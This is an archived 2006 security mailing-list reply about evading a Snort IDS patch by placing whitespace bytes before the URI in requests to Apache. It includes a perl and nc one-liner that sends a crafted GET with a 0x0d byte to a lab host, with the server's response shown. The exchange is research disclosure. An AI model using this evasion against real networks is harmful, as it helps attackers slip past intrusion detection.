|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Dailydave] Re: New Snort Bypass - Patch - Bypass of Patch
From: Sigint Consulting (info
sigint-consulting.com)
Date: Mon Jun 05 2006 - 13:50:18 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
>Apache 2 ignores any combination of the following bytes before the URI:
>0x09 0x0b 0x0c 0x0d 0x20 (man isspace)
>If you specify 0x0a before the URI, it causes Apache to truncate the
>request, so in most cases this results in the index.html page being
>returned. Try your 0x0a example again with a non-index.html URI and it
>will still serve up the main page.
HD,
You are correct, the request using \x0a is truncated and index.html is
returned, my apologies. However the \x0d character is still accepted
and the proper page is returned. I cannot confirm on anything except
apache 1.3.34 at the moment.
$ perl -e 'print "GET \x0d/html/1.html HTTP/1.0\n\r\n"'|nc 192.168.1.3
80
HTTP/1.1 200 OK
Date: Wed, 07 Jun 2006 08:42:53 GMT
Server: Apache/1.3.34 (Debian)
Last-Modified: Wed, 07 Jun 2006 08:42:37 GMT
ETag: "6f648-16-4486917d"
Accept-Ranges: bytes
Content-Length: 22
Connection: close
Content-Type: text/html; charset=iso-8859-1
this is a test 1.html
Chris
--------------------------------
www.sigint-consulting.com
infosigint-consulting.com
Charlotte, North Carolina
Information Security Consulting
--------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]